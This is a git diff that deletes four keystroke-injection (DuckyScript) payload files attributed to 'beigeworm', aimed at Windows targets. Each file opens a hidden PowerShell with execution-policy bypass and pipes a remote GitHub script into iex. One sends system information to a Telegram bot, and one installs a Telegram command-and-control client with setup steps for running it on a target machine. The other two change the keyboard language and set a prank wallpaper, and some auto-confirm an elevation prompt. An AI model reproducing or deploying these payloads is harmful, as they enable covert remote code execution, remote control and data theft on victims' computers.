b/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt deleted file mode 100644 index 7f8dd77..0000000 --- a/Fast-Execution-Scripts/Sys-Info-to-Telegram.txt +++ /dev/null @@ -1,20 +0,0 @@ - -REM Title: beigeworm's system information to Telegram Bot -REM Author: @beigeworm -REM Description: This script gathers system information and posts to Telegram Bot Chat with the results. -REM for setup info on telegram bots see - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1 -REM Target: Windows 10 - -REM *SETUP* -REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-TG.ps1 | iex -ENTER - diff --git a/Fast-Execution-Scripts/Telegram C2 Client.txt b/Fast-Execution-Scripts/Telegram C2 Client.txt deleted file mode 100644 index bc7fb34..0000000 --- a/Fast-Execution-Scripts/Telegram C2 Client.txt +++ /dev/null @@ -1,27 +0,0 @@ - -REM Title: beigeworm's Telegram Command And Control. -REM Author: @beigeworm -REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform. -REM Target: Windows 10 and 11 - -REM SETUP INSTRUCTIONS -REM 1. visit https://t.me/botfather and make a bot. -REM 2. add bot api to script. -REM 3. search for bot in top left box in telegram and start a chat then type /start. -REM 5. Run Script on target System -REM 6. Check telegram chat for 'waiting to connect' message. -REM 7. this script has a feature to wait until you start the session from telegram. -REM 8. type in the computer name from that message into telegram bot chat to connect to that computer. -REM 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex -ENTER - - diff --git a/Fast-Execution-Scripts/US-Keyboard.txt b/Fast-Execution-Scripts/US-Keyboard.txt deleted file mode 100644 index 297bb4d..0000000 --- a/Fast-Execution-Scripts/US-Keyboard.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: beigeworm's Keyboard Language changer. -REM Author: @beigeworm -REM Description: This script changes the keyboard layout and system language to US. -REM Target: Windows 10 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/US-keyboard.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y - - - diff --git a/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt b/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt deleted file mode 100644 index 2e0e4c7..0000000 --- a/Fast-Execution-Scripts/Wallpaper-Jumpscare.txt +++ /dev/null @@ -1,17 +0,0 @@ -REM Title: beigeworm's Wallpaper Jump Scare. -REM Author: @beigeworm -REM Description: This script changes downlaods a scary image and sets it as a wallpaper. -REM Target: Windows 10 - -REM some setup for dukie script -DEFAULT_DELAY 100 - -REM open powershell (remove "-W H" to show the window) -DELAY 1000 -GUI r -DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/wallpaper.ps1 | iex -CTRL-SHIFT ENTER -DELAY 3000 -ALT y -